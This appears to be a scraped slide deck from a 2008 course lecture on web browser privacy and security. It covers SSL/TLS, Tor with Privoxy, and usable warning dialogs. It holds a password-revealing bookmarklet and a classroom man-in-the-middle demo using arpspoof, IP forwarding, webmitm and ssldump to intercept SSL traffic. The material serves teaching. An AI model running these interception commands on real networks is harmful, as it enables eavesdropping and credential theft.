260 likes | 385 Views
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1. 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1. 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1. 1 0 1 1 1 0 1 1 0 1 1 0. Web Browser Privacy and Security. Dhruv Mohindra (MSISPM) Usable Privacy Security, Spring 08. 1 0 1 1 1
E N D
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 1 0 Web Browser Privacy and Security Dhruv Mohindra (MSISPM) Usable Privacy Security, Spring 08
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 A Model For Informed Consent 1 0 1 1 1 0 1 Source: Informed Consent by Design(Friedman, Lin, Miller)
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agreement Revisited... 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 On the other hand... 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 But with Web Browsers... • None of the approaches work - One is too intrusive, the other too lax • It is a good idea to reveal simple and required features - The vast population just wants to browse the Internet • Hide complexity underneath, advanced users can find it - Expose tutorials and links so that others are satisfied • Strike a trade-off between security and usability - Recovering Stored Passwords in Firefox 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Towards Better Usability... Javascript:( function() { var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page."); } )(); 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Secure Sockets Layer (SSL/TLS) • Set of cryptographic protocols • that provide secure • communications on the • Internet, for applications • Designed to protect from • eavesdropping, tampering, • replay and packet forgery. • SSL/TLS Implementations do • not signify secure “places” but • security in 'transit'. 1 0 1 1 1 0 1 Image Source: http://www.windowsitpro.com
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Exercise • How many people feel that they are safe while browsing non TLS(SSL)-enabled websites? • Have you every questioned someone about how SSL works and how you are safe with it? Or do you take technology for granted because everyone says “Use SSL to browse securely”? 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 Demonstration
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Man-in-the-middle Attack 1 0 1 1 1 0 1 Source: http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Man-in-the-middle Attack • SSL/TLS can be defeated with Social Engineering Run the following commands (with permission)- - $ arpspoof -t victimgateway - $ arpspoof -t gatewayvictim - $ echo 1 > /proc/sys/net/ipv4/ip_forward - $ wireshark - $ webmitm -dd - $ ssldump -n -d -k webmitm.crt | tee ssldump.log Where, victim is the IP address of the victim computer gateway is the IP address of the gateway (arpspoof utility comes with the dsniff package) 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Anonymous Browsing • What constitutes anonymity on the Internet? - Hiding the IP address - Disabling exchange of cookies - Other personally identifiable information • TOR (The Onion Router) - Routes traffic through three mix proxies by default - The sender encrypts a message thrice - Due to layered encryption, it is called Onion Routing - You are safer as long people in your anonymity set are non-identifiable - TOR is a SOCKS proxy and thus requires Privoxy - Privoxy handles http, https data and DNS lookups then passes traffic to TOR via a SOCKS connection 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 TOR Caveats • False sense of completion - Sometimes users mistakenly feel protected while they are not • Using TOR without Privoxy - Configuring a browser to use TOR as its SOCKS proxy doesn't work due to DNS lookups/leaks • Execution of Client-side code - Enabling Java, Javascript, Flash or ActiveX is very dangerous. • At first glance the whole system is difficult to grasp - No clear description of how tor, Vidalia, Privoxy work - No clear message that Privoxy is to run on port 8118 while TOR on 9050 (useful when configuring browser) 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 FoxTor on Linux • TOR, Privoxy and FoxTor installed gracefully - Compiled source packages as usual and installed the Firefox extension using the web browser. • Configuration of Privoxy was tricky - “forward-socks4a / 127.0.0.1:9050 .”, line had to be added in /etc/privoxy/config. Not mentioned in docs. - It would be nice to have FoxTor's 'help' have these descriptions • Runtime Issues - FoxTor continues to say “You are now Masked” even when one has turned off either Privoxy or tor. - The user may not realize the real source of the problem and may try fiddling with FoxTor instead 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Recent Developments • Context Sensitive Certificate Verification - Clarify relationship between user and server - Uses tokens and modifies web browsers - Displays a series of alert boxes...complicated? - Do you have information on removable media? - Are you internal member of Org. that owns server? - Doesn't help avoid dangers with public websites - Denial of Service • Specific Password Warnings - Alert user while sending unencrypted passwords - Series of confirmation windows again... - User Study participants are more careful when you tell them “Do not visit websites you consider too risky” 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Agenda • Web Browsing and 'The User' • Technology Overview • Security Concerns • Privacy Matters • Recent Developments • Suggestions 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Context Sensitive Dialog Boxes 1 0 1 1 1 0 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 Context Sensitive Dialog Boxes 1 0 1 1 1 0 1 - Covey application or website specific risk - More intuitive and easy to understand - Users can click 'x' to dismiss anytime - 'Learn More' is default, curious users will click at first instinct - Conveys the initial meaning without any verbose statements - Tailor according to skill set of user, ask at browser installation time - Change images while adapting to user's daily usage and preferences
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 Conclusion
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1 1 0 1 1 1 0 1 Questions